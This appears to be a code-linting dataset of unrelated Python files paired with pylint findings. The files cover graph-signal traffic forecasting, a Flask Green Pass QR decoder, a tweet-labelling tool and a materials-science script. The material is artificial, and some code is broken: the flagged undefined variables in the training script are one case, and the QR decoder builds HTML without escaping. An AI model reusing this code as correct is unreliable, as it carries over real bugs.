11 def PrepareSequence(data, seq_len = 10, pred_len = 1):
12
13 time_len = data.shape[0]
14 sequences, labels = [], []
15 for i in range(time_len - seq_len - pred_len):
16 sequences.append(data[i:i+seq_len])
17 labels.append(data[i+seq_len+pred_len-1:i+seq_len+pred_len])
18 return np.asarray(sequences), np.asarray(labels)
19
20
21
22 def SplitData(data, label = None, seq_len = 10, pred_len = 1, train_proportion = 0.7,
23 valid_proportion = 0.2, shuffle = False):
24
25 max_value = np.max(data)
26 data /= max_value
27 samp_size = data.shape[0]
28 if label is not None:
29 assert(label.shape[0] == samp_size)
30
31 index = np.arange(samp_size, dtype = int)
32 train_index = int(np.floor(samp_size * train_proportion))
33 valid_index = int(np.floor(samp_size * ( train_proportion + valid_proportion)))
34
35 if label is not None:
36 train_data, train_label = data[:train_index+pred_len-1], label[:train_index+pred_len-1]
37 valid_data, valid_label = data[train_index-seq_len:valid_index+pred_len-1], label[train_index-seq_len:valid_index+pred_len-1]
38 test_data, test_label = data[valid_index-seq_len:], label[valid_index-seq_len:]
39 return (train_data, train_label), (valid_data, valid_label), (test_data, test_label), max_value
40
41 else:
42 train_data = data[:train_index+pred_len-1]
43 valid_data = data[train_index-seq_len:valid_index+pred_len-1]
44 test_data = data[valid_index-seq_len:]
45 return train_data ,valid_data, test_data, max_value
46
47
48
49 def Dataloader(data, label, batch_size = 40, suffle = False):
50
51 data, label = torch.Tensor(data), torch.Tensor(label )
52 dataset = utils.TensorDataset(data, label)
53 dataloader = utils.DataLoader(dataset, batch_size = batch_size, shuffle=suffle, drop_last = True)
54 return dataloader
55
56
57 def Preprocessing_hop_interp(matrix, A ,sample):
58
59 unknown = complement(sample,matrix.shape[1])
60 features_unknown = np.copy(matrix.values)
61 features_unknown[:,unknown] = np.mean(matrix.values[:100,sample])
62 for node in unknown:
63 neighbors = np.nonzero(A[node])[0]
64 for t in range(features_unknown.shape[0]):
65 features_unknown[np.array([t]), np.array([node])] = np.mean(features_unknown[t, neighbors])
66 return features_unknown
67
68
69 def MaxScaler(data):
70 max_value = np.max(data)
71 return max_value, data/max_value
72
73 def Preprocessing_GFT(matrix,sample, V , freqs ):
74
75 x = matrix.T
76 Vf = V[:, freqs]
77 Psi = np.zeros((V.shape[0],x.shape[1]))
78 Psi[sample] = x
79 Tx = (Vf.T@Psi).T
80 return Tx
81
82 class DataPipeline:
83 def __init__(self, sample, V , freqs ,seq_len, pred_len, gft = True):
84 """
85 DataPipeline: perform the sampling procedure on the graph signals and create the dataloader object
86 Args:
87 sample (np array): list of graph indices
88 V (2D np array): Laplacian eigenvector matrix
89 freqs (np array): list of frequency indices
90 seq_len (int, optional): size of historical data. Defaults to 10.
91 pred_len (int, optional): number of future samples. Defaults to 1.
92 gft (bool, optional): if Fourier transform should be applied. Defaults to False.
93 """
94
95 self.sample = sample
96 self.V = V
97 self.freqs = freqs
98 self.seq_len = seq_len
99 self.pred_len = pred_len
100 self.gft = gft
101
102 def fit(self,train_data,sample_label = True, batch_size=40, shuffle=True):
103 """
104 fit: build dataloader for training data
105
106 Args:
107 train_data (numpy array): train data
108 sample_label (bool, optional): If labels should be sampled for a semisupervised
109 learning. Defaults to True.
110 batch_size (int, optional): batch size. Defaults to 40.
111 shuffle (bool, optional): If samples should be shuffled. Defaults to True.
112
113 Returns:
114 pytorch Dataloader: train data prepared for training
115 """
116
117 train_X, train_y = PrepareSequence(train_data, seq_len = self.seq_len, pred_len = self.pred_len)
118
119 if self.gft:
120 train_data_freqs = Preprocessing_GFT(train_data[:,self.sample],self.sample, self.V , self.freqs )
121 train_X_freqs, _ = PrepareSequence(train_data_freqs, seq_len = self.seq_len, pred_len = self.pred_len)
122 train_X = np.concatenate((train_X[:,:,self.sample], train_X_freqs), axis=-1)
123
124 if sample_label:
125 train_y = train_y.T[self.sample]
126 train_y = train_y.T
127
128 return Dataloader(train_X, train_y, batch_size, shuffle)
129
130 def transform(self, data, sample_label = True, batch_size=40,shuffle=True):
131 """
132 transform: build dataloader for validation and test data
133
134 Args:
135 train_data (numpy array): train data
136 sample_label (bool, optional): If validation labels should be sampled for a
137 semisupervised learning. Defaults to True.
138 batch_size (int, optional): batch size. Defaults to 40.
139 shuffle (bool, optional): If samples should be shuffled. Defaults to True.
140
141 Returns:
142 pytorch Dataloader: train data prepared for training
143 """
144
145 X, y = PrepareSequence(data, seq_len = self.seq_len, pred_len = self.pred_len)
146
147 if self.gft:
148 data_freqs = Preprocessing_GFT(data[:,self.sample],self.sample, self.V , self.freqs)
149 X_freqs, _ = PrepareSequence(data_freqs, seq_len = self.seq_len, pred_len = self.pred_len)
150
151 X = np.concatenate((X[:,:,self.sample], X_freqs), axis=-1)
152 if sample_label:
153 y = y.T[self.sample]
154 y = y.T
155 return Dataloader(X, y, batch_size, shuffle)
156
157
158
159
160
161
162
163
| 22 - refactor: too-many-arguments
22 - refactor: too-many-positional-arguments
22 - refactor: too-many-locals
35 - refactor: no-else-return
23 - warning: unused-argument
31 - warning: unused-variable
83 - refactor: too-many-arguments
83 - refactor: too-many-positional-arguments
2 - warning: unused-import
4 - warning: unused-import
|
1 import os
2 import time
3 import torch
4 import argparse
5 import numpy as np
6 import pandas as pd
7 import time
8
9 from data.Load_data import Seattle_data
10 from data.Dataloader import *
11
12 from pytorch_gsp.train.train_rnn import Evaluate, Train
13 from pytorch_gsp.utils.gsp import ( greedy_e_opt, spectral_components)
14 from pytorch_gsp.models.sggru import *
15
16 def n_params(model):
17 params=[]
18 for param in model.parameters():
19 params.append(param.numel())
20 return np.sum(params)
21
22 print(torch.__version__)
23
24
25
26 def training_routine(args):
27
28
29 device = 'cuda' if torch.cuda.is_available else 'cpu'
30 if args.device == 'cuda' and device == 'cpu':
31 print("cuda is not available, device set to cpu")
32 else:
33 assert (args.device in ['cpu','cuda'])
34 device = args.device
35
36 lr = args.lr
37 epochs = args.epochs
38 seq_len = args.seq_len
39 pred_len = args.pred_len
40 patience = args.patience
41 name = args.save_name
42 speed_matrix, A, FFR = Seattle_data('data/Seattle_Loop_Dataset/') #put seattle Loop dataset in this directory
43
44
45 N = speed_matrix.shape[1]
46
47 S = int(args.sample_perc*N/100)
48 if args.F_perc is None:
49 F = int(S/3)
50 else:
51 F = int(args.F_perc*N/100)
52
53 assert(S>F) # the sampling set must be larger than the spectral support
54
55 #compute gft
56 F_list, V = spectral_components(A,np.array(speed_matrix)[:1000] )
57 if args.supervised:
58 freqs = F_list[:F]
59 else:
60 freqs = np.arange(0,F,1)
61
62 if args.e_opt:
63 print("Using e-optimal greedy algorithm")
64 if args.sample_perc == 25:
65 sample = np.load( 'data/Seattle_Loop_Dataset/sample_opt25.npy')[0]
66 elif args.sample_perc == 50:
67 sample = np.load( 'data/Seattle_Loop_Dataset/sample_opt50.npy')[0]
68 elif args.sample_perc == 75:
69 sample = np.load( 'data/Seattle_Loop_Dataset/sample_opt75.npy')[0]
70 else:
71 sample = greedy_e_opt(V[:,Fs],S)
72
73 else: sample = np.sort(np.random.choice(np.arange(N), S, replace = False))
74
75 S = len(sample)
76 pre_time = time.time()
77
78 train, valid, test,max_value = SplitData(speed_matrix.values, label = None, seq_len = 10,
79 pred_len = 1, train_proportion = 0.7,
80 valid_proportion = 0.2, shuffle = False)
81
82 pipeline = DataPipeline(sample,V,freqs,seq_len,pred_len)
83
84 train_dataloader = pipeline.fit(train)
85 valid_dataloader = pipeline.transform(valid)
86 test_dataloader = pipeline.transform(test,sample_label=False,batch_size = test.shape[0]-seq_len-pred_len,shuffle=False)
87
88 print("Preprocessing time:", time.time()-pre_time)
89
90
91 layer = SpectralGraphForecast(V, sample,freqs, rnn = 'gru')
92 if args.supervised:
93 sggru = model(V,sample,freqs, layer,l1=0,l2=0.0,supervised = True).to(device)
94 else:
95 sggru = model(V,sample,freqs, layer,l1=0,l2=0.0,supervised = False).to(device)
96
97 pre_time = time.time()
98
99 print("Total number of nodes: {}".format(N))
100 print("Sample size: {}".format(S))
101 print("Spectral sample size: {}".format(F))
102 print("Initial learning rate: {}".format(lr))
103
104
105 sggru,sggru_loss= Train(sggru ,train_dataloader, valid_dataloader, epochs = epochs,
106 learning_rate = lr,patience=patience ,sample = sample)
107 print("Training time:", time.time()-pre_time)
108 pre_time = time.time()
109 sggru_test = Evaluate(sggru.to(device), test_dataloader, max_value )
110 print("Test time:", time.time()-pre_time)
111 name = 'sggru'
112
113 loss = (sggru_loss,sggru_test)
114 os.makedirs("models_and_losses/", exist_ok=True)
115 torch.save(sggru, "models_and_losses/{}.pt".format(name))
116 np.save("models_and_losses/{}.npy".format(name),loss)
117
118
119 if __name__ == "__main__":
120 parser = argparse.ArgumentParser(description='Semi-Supervised Prediction\n SeattleLoop dataset \n download link: https://github.com/zhiyongc/Seattle-Loop-Data ')
121 parser.add_argument('--epochs', type=int, default = 100, help='maximum number of epochs before stopping training')
122 parser.add_argument('--lr', type=float, default = 1e-4, help='starting learn rate' )
123 parser.add_argument('--patience', type=int, default = 10, help='number of consecutive non-improving validation loss epochs before stop training')
124 parser.add_argument('--sample-perc', type=int, default = 50, help='percentage of in-sample nodes')
125 parser.add_argument('--F-perc', type=int, default = None, help='percentage of frequencies to keep in frequency set \mathcal{F}')
126 parser.add_argument('--S-perc', type=int, default = 50, help='percentage of samples')
127 parser.add_argument('--e-opt', action='store_true',help='if sampling is performed by E-optmal greedy algorithm')
128 parser.add_argument('--sample-seed',type=int,default=1, help='number of run with uniformely random samples. Only used if --e-opt is False')
129 parser.add_argument('--seq-len', type=int,default=10, help='history length')
130 parser.add_argument('--pred-len', type=int,default=1, help='prediction horizon')
131 parser.add_argument('--save-name', type=str, default='sggru_S50_F53_opt_pred1', help='name of file')
132 parser.add_argument('--supervised', action='store_true', help='if training is supervised or semi-supervised. Deafault is semi-supervised')
133 parser.add_argument('--device', type=str, default='cuda', help='devices: cuda or cpu')
134 args = parser.parse_args()
135 training_routine(args)
136
| 125 - warning: anomalous-backslash-in-string
7 - warning: reimported
10 - warning: wildcard-import
14 - warning: wildcard-import
26 - refactor: too-many-locals
26 - warning: redefined-outer-name
29 - warning: missing-parentheses-for-call-in-test
29 - warning: using-constant-test
71 - error: undefined-variable
78 - error: undefined-variable
82 - error: undefined-variable
91 - error: undefined-variable
93 - error: undefined-variable
95 - error: undefined-variable
26 - refactor: too-many-branches
26 - refactor: too-many-statements
42 - warning: unused-variable
6 - warning: unused-import
|
1 import os
2 import sys
3
4 current_dir = os.path.split(os.path.dirname(os.path.realpath(__file__)))[0]
5 sys.path.append(os.path.join(current_dir, 'data'))
6 print(sys.path) | Clean Code: No Issues Detected
|
1 import math
2 import sys
3 import time
4
5 import numpy as np
6 import pandas as pd
7 from sklearn.metrics.pairwise import rbf_kernel
8
9
10
11 def USA_data(directory ):
12 """"TODO: include the GSOD dataset"""
13 signals = pd.read_csv( directory + 'Usa_temp.csv')
14 if "Unnamed: 0" in signals.columns:
15 signals.drop(columns="Unnamed: 0", inplace = True)
16 A = np.load( directory + 'Adjk10_07-13.npy')
17
18 return signals, A
19
20
21 def Seattle_data(directory , binary=False):
22 """
23 Seattle_data:
24 https://github.com/zhiyongc/Graph_Convolutional_LSTM/blob/master/Code_V2/HGC_LSTM%20%26%20Experiments.ipynb
25
26 Args:
27 directory (str): directory of the seattle loop detector dataset
28 binary (bool, optional): I the matrix should be binary or the RBF kernel should
29 be used on the . Defaults to False.
30
31 Returns:
32 speed_matrix: graph signals with time in the rows and nodes in the columns
33 A: adjacency matrix
34 FFR: free flow reachability matrices
35 """
36 speed_matrix = pd.read_pickle( directory + 'speed_matrix_2015',)
37 A = np.load( directory + 'Loop_Seattle_2015_A.npy')
38
39 if not binary:
40 cor = rbf_kernel(speed_matrix[:1000].T/10)
41 A = cor*(A)
42 e, V = np.linalg.eigh(A)
43 A/=np.max(e)
44 A = A-np.diag(A.diagonal())
45
46 FFR_5min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_5min.npy')
47 FFR_10min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_10min.npy')
48 FFR_15min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_15min.npy')
49 FFR_20min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_20min.npy')
50 FFR_25min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_25min.npy')
51 FFR = [FFR_5min, FFR_10min, FFR_15min, FFR_20min, FFR_25min]
52 return speed_matrix, A, FFR
53
54
55
56
57
58
| 42 - warning: unused-variable
1 - warning: unused-import
2 - warning: unused-import
3 - warning: unused-import
|
1 from setuptools import setup, find_packages
2
3 setup(
4 name='Joint-Forecasting-and-Interpolation-of-Graph-Signals-Using-Deep-Learning',
5 version='0.1.0',
6 author='Gabriela Lewenfus',
7 author_email='gabriela.lewenfus@gmail.com',
8 packages=find_packages(),
9 install_requires = ['scipy>=1.4.1', 'pandas>=0.15', 'scikit-learn>=0.22', 'numpy>=0.46'],
10 description='Code from the paper Joint Forecasting and Interpolation of Graph Signals Using Deep Learning',
11
12 ) | Clean Code: No Issues Detected
|
1 ### training code ####
2
3 import sys
4 import time
5
6 import numpy as np
7 import torch
8 from torch.autograd import Variable
9
10 toolbar_width=20
11
12
13
14 def Train(model, train_dataloader, valid_dataloader, learning_rate = 1e-5, epochs = 300, patience = 10,
15 verbose=1, gpu = True, sample = None, optimizer = 'rmsprop'):
16
17 if optimizer == 'rmsprop':
18 optimizer = torch.optim.RMSprop(model.parameters(), lr = learning_rate)
19 elif optimizer == 'adam':
20 optimizer = torch.optim.Adam(model.parameters(), lr = learning_rate )
21
22 loss_MSE = torch.nn.MSELoss()
23 loss_L1 = torch.nn.L1Loss()
24 batch_size = train_dataloader.batch_size
25
26 if gpu: device='cuda'
27 else: device= 'cpu'
28
29 losses_epochs_train = []
30 losses_epochs_valid = []
31 time_epochs = []
32 time_epochs_val = []
33
34 is_best_model = 0
35 patient_epoch = 0
36 scheduler = model.schedule(optimizer)
37
38 for epoch in range(epochs):
39 pre_time = time.time()
40
41 try:
42 data_size=train_dataloader.dataset.data_size
43 except: pass
44 try:
45 data_size=train_dataloader.dataset.tensors[0].shape[0]
46 except: pass
47 n_iter=data_size/train_dataloader.batch_size
48 if verbose:
49 count=0
50
51 checkpoints=np.linspace(0,n_iter,toolbar_width).astype(np.int16)
52 text='Epoch {:02d}: '.format(epoch)
53 sys.stdout.write(text+"[%s]" % (" " * toolbar_width))
54 sys.stdout.flush()
55 sys.stdout.write("\b" * (toolbar_width+1))
56
57 losses_train = []
58 losses_valid = []
59
60 for data in train_dataloader:
61 inputs, labels = data
62 if inputs.shape[0] != batch_size:
63 continue
64
65 model.zero_grad()
66 outputs = model(inputs.to(device))
67 outputs, y = torch.squeeze(outputs), torch.squeeze(labels).to(device)
68 loss_train = model.loss(outputs,y)
69
70 losses_train.append(loss_train.cpu().data.numpy())
71 optimizer.zero_grad()
72 loss_train.backward()
73 optimizer.step()
74
75 if verbose:
76 if count in checkpoints:
77 sys.stdout.write('=')
78 sys.stdout.flush()
79 count+=1
80
81 for param_group in optimizer.param_groups:
82 learning_rate = param_group['lr']
83 if learning_rate >1e-5:
84 scheduler.step()
85 time_epochs.append(time.time()-pre_time)
86
87 pre_time = time.time()
88
89 losses_valid = []
90 for data in valid_dataloader:
91 inputs, labels = data
92 if inputs.shape[0] != batch_size:
93 continue
94
95 outputs= model(inputs.to(device))
96 outputs, y = torch.squeeze(outputs), torch.squeeze(labels).to(device)
97 losses_valid.append(model.loss(outputs, y).cpu().data.numpy())
98
99 time_epochs_val.append(time.time()-pre_time)
100 losses_epochs_train.append(np.mean(losses_train))
101 losses_epochs_valid.append(np.mean(losses_valid))
102
103 avg_losses_epoch_train = losses_epochs_train[-1]
104 avg_losses_epoch_valid = losses_epochs_valid[-1]
105
106
107 if avg_losses_epoch_valid >100000000000:
108 print("Diverged")
109 return (None,None)
110 if epoch == 0:
111 is_best_model = True
112 best_model = model
113 min_loss = avg_losses_epoch_valid
114 else:
115 if min_loss - avg_losses_epoch_valid > 1e-6:
116 is_best_model = True
117 best_model = model
118 min_loss = avg_losses_epoch_valid
119 patient_epoch = 0
120 else:
121 is_best_model = False
122 patient_epoch += 1
123 if patient_epoch >= patience:
124 print('Early Stopped at Epoch:', epoch)
125 break
126
127 if verbose:
128 sys.stdout.write("]")
129
130 print(' train loss: {}, valid loss: {}, time: {}, lr: {}'.format( \
131 np.around(avg_losses_epoch_train, 6),\
132 np.around(avg_losses_epoch_valid, 6),\
133 np.around([time_epochs[-1] ] , 2),\
134 learning_rate) )
135
136
137 return best_model, [losses_epochs_train ,
138 losses_epochs_valid ,
139 time_epochs ,
140 time_epochs_val ]
141
142
143 def Evaluate(model, dataloader, scale=1, pred_len = 1, gpu = True):
144
145 batch_size = dataloader.batch_size
146 pre_time = time.time()
147
148 gpu = torch.cuda.is_available()
149 if gpu: device='cuda'
150 else: device= 'cpu'
151
152 losses_mse = []
153 losses_l1 = []
154 losses_mape = []
155
156 for i,data in enumerate(dataloader):
157 inputs, labels = data
158 if inputs.shape[0] != batch_size:
159 continue
160
161 outputs = model(inputs.to(device))
162 outputs, y = torch.squeeze(outputs), torch.squeeze(labels).to(device)
163
164 loss_mse = torch.nn.MSELoss()(outputs*scale, y*scale).cpu().data
165 loss_l1 = torch.nn.L1Loss()(outputs*scale, y*scale).cpu().data
166
167 outputs = outputs.cpu().data.numpy()
168 y = y.cpu().data.numpy()
169 outputs = outputs*scale
170 y = y*scale
171
172 abs_diff = np.abs((outputs-y))
173 abs_y = np.abs(y)
174 abs_diff=abs_diff[abs_y>1]
175 abs_y=abs_y[abs_y>1]
176
177 loss_mape = abs_diff/abs_y
178 loss_mape = np.mean(loss_mape)*100
179
180 losses_mse.append(loss_mse)
181 losses_l1.append(loss_l1)
182 losses_mape.append(loss_mape)
183
184 losses_l1 = np.array(losses_l1)
185 losses_mse = np.array(losses_mse)
186 mean_l1 = np.mean(losses_l1, axis = 0)
187 rmse = np.mean(np.sqrt(losses_mse))
188 print('Test: MAE: {}, RMSE : {}, MAPE : {}'.format(mean_l1, rmse,np.mean(losses_mape)))
189
190
191 return [losses_l1, losses_mse, mean_l1, np.mean(losses_mape), time.time()-pre_time]
192
193
194 ### modified from https://github.com/zhiyongc/Graph_Convolutional_LSTM/blob/master/Code_V2/HGC_LSTM%20%26%20Experiments.ipynb | 14 - refactor: too-many-arguments
14 - refactor: too-many-positional-arguments
14 - refactor: too-many-locals
43 - warning: bare-except
46 - warning: bare-except
14 - refactor: too-many-branches
14 - refactor: too-many-statements
15 - warning: unused-argument
22 - warning: unused-variable
23 - warning: unused-variable
34 - warning: unused-variable
143 - refactor: too-many-locals
143 - warning: unused-argument
156 - warning: unused-variable
8 - warning: unused-import
|
1 from flask import Flask, redirect, request, render_template
2 from os.path import splitext
3 from flask_sslify import SSLify
4 from flask_babel import Babel, gettext
5 import os
6 from lib.greenpass import GreenPassDecoder as greenpass_decoder
7
8 is_prod = os.environ.get('PRODUCTION', None)
9 ga_id = os.environ.get('GA_ID', None)
10 sharethis_script_src = os.environ.get('SHARETHIS_SCRIPT_SRC', None)
11 app_url = os.environ.get('APP_URL', None)
12
13 app = Flask(__name__)
14
15 app.config['BABEL_DEFAULT_LOCALE'] = 'en'
16 app.config['MAX_CONTENT_LENGTH'] = 4096 * 1024
17 app.config['UPLOAD_EXTENSIONS'] = ['.jpg', '.png', '.jpeg']
18 app.config['GITHUB_PROJECT'] = 'https://github.com/debba/greenpass-covid19-qrcode-decoder'
19 app.config[
20 'DCC_SCHEMA'] = 'https://raw.githubusercontent.com/ehn-dcc-development/ehn-dcc-schema/release/1.3.0/DCC.combined-schema.json'
21 app.glb_schema = {}
22 app.converted_schema = ''
23 app.config['LANGUAGES'] = {
24 'en': 'English',
25 'it': 'Italiano'
26 }
27 babel = Babel(app)
28
29
30 @babel.localeselector
31 def get_locale():
32 return request.accept_languages.best_match(app.config['LANGUAGES'].keys())
33
34
35 if is_prod:
36 sslify = SSLify(app)
37
38
39 @app.context_processor
40 def inject_user():
41 return dict(github_project=app.config['GITHUB_PROJECT'], is_prod=is_prod, ga_id=ga_id,
42 sharethis_script_src=sharethis_script_src, app_url=app_url,
43 app_name=gettext('Green Pass COVID-19 QRCode Decoder'))
44
45
46 @app.route('/', methods=['GET'])
47 def home():
48 return render_template('home.html')
49
50
51 @app.route('/qrdata', methods=['GET', 'POST'])
52 def qrdata():
53 if request.method == 'POST':
54 if request.files['image'].filename != '':
55 app.converted_schema = ''
56 image = request.files['image']
57 filename = image.filename
58 file_ext = splitext(filename)[1]
59 if filename != '':
60 if file_ext not in app.config['UPLOAD_EXTENSIONS']:
61 return render_template('error.html', error='UPLOAD_EXTENSIONS_ERROR', file_ext=file_ext), 400
62
63 try:
64 decoder = greenpass_decoder(image.stream)
65 return render_template('data.html', data=decoder.decode(app.config['DCC_SCHEMA']))
66 except (ValueError, IndexError) as e:
67 print(e)
68 return render_template('error.html', error='UPLOAD_IMAGE_NOT_VALID'), 400
69
70 return render_template('error.html', error='UPLOAD_IMAGE_WITH_NO_NAME'), 500
71 else:
72 return redirect('/') | 41 - refactor: use-dict-literal
53 - refactor: no-else-return
|
1 from pyzbar.pyzbar import decode
2 from PIL import Image
3 from base45 import b45decode
4 from zlib import decompress
5 from flynn import decoder as flynn_decoder
6 from lib.datamapper import DataMapper as data_mapper
7
8
9 class GreenPassDecoder(object):
10 stream_data = None
11
12 def __init__(self, stream_data):
13 self.stream_data = decode(Image.open(stream_data))[0].data
14
15 def decode(self, schema):
16 qr_decoded = self.stream_data[4:]
17 qrcode_data = decompress(b45decode(qr_decoded))
18 (_, (header_1, header_2, cbor_payload, sign)) = flynn_decoder.loads(qrcode_data)
19 data = flynn_decoder.loads(cbor_payload)
20 dm = data_mapper(data, schema)
21 return dm.convert_json()
| 9 - refactor: useless-object-inheritance
18 - warning: unused-variable
18 - warning: unused-variable
18 - warning: unused-variable
9 - refactor: too-few-public-methods
|
1 import json
2 from urllib.request import urlopen
3
4
5 class DataMapperError(Exception):
6 pass
7
8
9 class DataMapper:
10 qr_data = None
11 schema = None
12
13 json = ''
14 new_json = {}
15
16 def _save_json(self, data, schema, level=0):
17
18 for key, value in data.items():
19 try:
20 description = schema[key].get('title') or schema[key].get('description') or key
21 description, _, _ = description.partition(' - ')
22 if type(value) is dict:
23 self.json += '<p>' + (' ' * level) + '<strong>' + description + '</strong></p>'
24 _, _, sch_ref = schema[key]['$ref'].rpartition('/')
25 self._save_json(value, self.schema['$defs'][sch_ref]['properties'], level + 1)
26 elif type(value) is list:
27 self.json += '<p>' + (' ' * level) + '<strong>' + description + '</strong></p>'
28 _, _, sch_ref = schema[key]['items']['$ref'].rpartition('/')
29 for v in value:
30 self._save_json(v, self.schema['$defs'][sch_ref]['properties'], level + 1)
31 else:
32 self.json += '<p>' + (' ' * level) + '<strong>' + description + '</strong>' + ':' + str(
33 value) + '</p>'
34 except KeyError:
35 print('error keys')
36 print(data)
37
38 def __set_schema(self, schema_url):
39 sch = urlopen(schema_url)
40 self.schema = json.load(sch)
41
42 def __init__(self, qr_data, schema_url, params_string=False):
43
44 i = -260
45 j = 1
46
47 if params_string:
48 i = str(i)
49 j = str(j)
50
51 self.json = ''
52 self.qr_data = qr_data[i][j]
53 self.__set_schema(schema_url)
54
55 def convert_json(self):
56 if self.qr_data is None:
57 raise DataMapperError("QR_DATA_IS_WRONG")
58 if self.schema is None:
59 raise DataMapperError("SCHEMA_IS_WRONG")
60 self._save_json(self.qr_data, self.schema['properties'])
61 return self.json
| 18 - warning: bad-indentation
19 - warning: bad-indentation
20 - warning: bad-indentation
21 - warning: bad-indentation
22 - warning: bad-indentation
23 - warning: bad-indentation
24 - warning: bad-indentation
25 - warning: bad-indentation
26 - warning: bad-indentation
27 - warning: bad-indentation
28 - warning: bad-indentation
29 - warning: bad-indentation
30 - warning: bad-indentation
31 - warning: bad-indentation
32 - warning: bad-indentation
34 - warning: bad-indentation
35 - warning: bad-indentation
36 - warning: bad-indentation
39 - refactor: consider-using-with
9 - refactor: too-few-public-methods
|
1 import pandas as pd
2 import csv
3 import os
4 from pandas import ExcelWriter
5
6
7
8 class Tweet:
9 def import_data(self, PATH, type):
10 if type == "xlsx":
11 xl = pd.ExcelFile(PATH)
12 data = xl.parse("Sheet1")
13 if type == "csv":
14 data = pd.read_csv(PATH)
15 # if type == "csv":
16 # with open(PATH, newline='') as f:
17 # reader = csv.reader(f)
18 # data = list(reader)
19 return data
20
21 def label_key2char(self, key):
22 """
23 :param num: the input x,y,z from keyboard
24 :return: fact, opinion, anti-fact, if other than x,y,z return ""
25 """
26 if key == "0":
27 return "fact"
28 elif key == "1":
29 return "opinion"
30 elif key == "2":
31 return "misinformation"
32 else:
33 return ""
34
35 def create_labels(self, df):
36 """
37 :param df: imported data in dataframe format
38 :return: dataframe with added label in ManualLabel column
39 """
40 labels = df["ManualLabel"].tolist()
41 for index, row in df.iterrows():
42 if pd.isna(row["ManualLabel"]):
43 print("===========")
44 print("Tweet Text")
45 print(row["Tweet Text"])
46 print("===========")
47 print("Row Number: "+ str(index))
48 print("Subjective: " + str(row["SubjectivityScores"]))
49 print("Sentiment: " + str(row["FlairSentimentScore"]) + " " + str(row["FlairSentiment"]))
50 print("===========")
51 print('Classify as fact(0), opinion(1), misinformation(2) OR Skip(s), Quit(q): ')
52 print("Your Label:")
53 getch = _Getch()
54 label = getch()
55 label_char = self.label_key2char(label)
56 os.system('cls' if os.name == 'nt' else 'clear')
57 if label == "q":
58 break
59 labels[index] = label_char
60 else:
61 continue
62 df.drop(columns=["ManualLabel"], inplace=True)
63 df["ManualLabel"] = labels
64 return df
65
66 def save_labels(self, tweets_labeled, PATH, type, index):
67 df = tweets_labeled
68 if type == "xlsx":
69 writer = ExcelWriter(PATH)
70 df.to_excel(writer, 'Sheet1', index=index)
71 writer.save()
72 if type == "csv":
73 df.to_csv(PATH, index=index)
74
75
76 class _Getch:
77 """Gets a single character from standard input. Does not echo to the
78 screen."""
79 def __init__(self):
80 try:
81 self.impl = _GetchWindows()
82 except ImportError:
83 self.impl = _GetchUnix()
84
85 def __call__(self): return self.impl()
86
87
88 class _GetchUnix:
89 def __init__(self):
90 import tty, sys
91
92 def __call__(self):
93 import sys, tty, termios
94 fd = sys.stdin.fileno()
95 old_settings = termios.tcgetattr(fd)
96 try:
97 tty.setraw(sys.stdin.fileno())
98 ch = sys.stdin.read(1)
99 finally:
100 termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
101 return ch
102
103
104 class _GetchWindows:
105 def __init__(self):
106 import msvcrt
107
108 def __call__(self):
109 import msvcrt
110 return msvcrt.getch()
111
| 9 - warning: redefined-builtin
19 - error: possibly-used-before-assignment
26 - refactor: no-else-return
66 - warning: redefined-builtin
71 - error: no-member
76 - refactor: too-few-public-methods
90 - warning: unused-import
90 - warning: unused-import
88 - refactor: too-few-public-methods
106 - warning: unused-import
104 - refactor: too-few-public-methods
2 - warning: unused-import
|
1 # This is a sample Python script.
2
3 # Press ⌃R to execute it or replace it with your code.
4 # Press Double ⇧ to search everywhere for classes, files, tool windows, actions, and settings.
5 from utils import Tweet
6
7 def print_hi(name):
8 # Use a breakpoint in the code line below to debug your script.
9 print(f'Hi, {name}') # Press ⌘F8 to toggle the breakpoint.
10
11
12 # Press the green button in the gutter to run the script.
13 if __name__ == '__main__':
14 print_hi('Start Labeling')
15
16 # See PyCharm help at https://www.jetbrains.com/help/pycharm/
17 #PATH = "Jun/test.csv"
18 PATH = "Kebby/MarchNonExpertsManualLabel3.csv" #first save the .xlsx file as .csv
19
20 tweet = Tweet()
21 tweets = tweet.import_data(PATH, "csv")
22 tweets_labeled = tweet.create_labels(tweets)
23 tweet.save_labels(tweets_labeled, PATH, "csv", index=False)
| Clean Code: No Issues Detected
|
1 # ---------------------------------------------------------------------------
2 # ---------------------------------------------------------------------------
3 # This code is a supplement for the journal article titled:
4 # "Spectrum of Embrittling Potencies and Relation to Properties of
5 # Symmetric-Tilt Grain Boundaries"
6 # ------------------
7 # This code performs the following tasks:
8 # 1) Reads in Fi, Xi, Pi from the previous step
9 # 2) Calculates site-specific properties that are shown in Table 2 and Fig. 6
10 # 3) Calculates collective-behavior properties that are shown in Table 3 and Fig. 5
11 # 4) Generates all data frames for plotting
12 # --- Definitions and Abbreviations --
13 # GB: Grain boundary
14 # FS: Free surface
15 # ------------------
16 # Authors: Doruk Aksoy (1), Rémi Dingreville (2), Douglas E. Spearot (1,*)
17 # (1) University of Florida, Gainesville, FL, USA
18 # (2) Center for Integrated Nanotechnologies, Sandia National Laboratories,
19 # Albuquerque, NM, USA
20 # (*) dspearot@ufl.edu
21 # ---------------------------------------------------------------------------
22 # ---------------------------------------------------------------------------
23 #%% Imports
24 import numpy as np
25 import pandas as pd
26 from os import listdir,path
27
28 # %% Define functions
29 def getNumOfAtoms(file_path, file_name):
30 '''
31 Obtain number of atoms from the file.
32
33 Parameters
34 ----------
35 file_path : File path
36 file_name : Name of the file
37
38 Returns
39 -------
40 Number of atoms
41
42 '''
43 with open(path.join(file_path,file_name), 'r') as atoms_file:
44 # Number of atoms is equal to number of lines without the header
45 lineCount = 0
46 for line in atoms_file:
47 lineCount += 1
48 return int(lineCount)-1
49
50 def getEnergies(file_path, file_name, arr):
51 '''
52 Function to obtain energies from file
53
54 Parameters
55 ----------
56 file_path : File path
57 file_name : Name of the file
58 arr : Array to write energies
59
60 '''
61 with open(path.join(file_path,file_name), 'r') as results_file:
62 for ind,line in enumerate(results_file):
63 # Skip the header
64 if "#" not in line:
65 line = line.split()
66 for j in range(int(np.size(line))):
67 arr[int(ind)-1,j] = line[j]
68
69 def segEngOcc(energies,col_num,NDIGITS):
70 '''
71 Function to obtain energies from file
72
73 Parameters
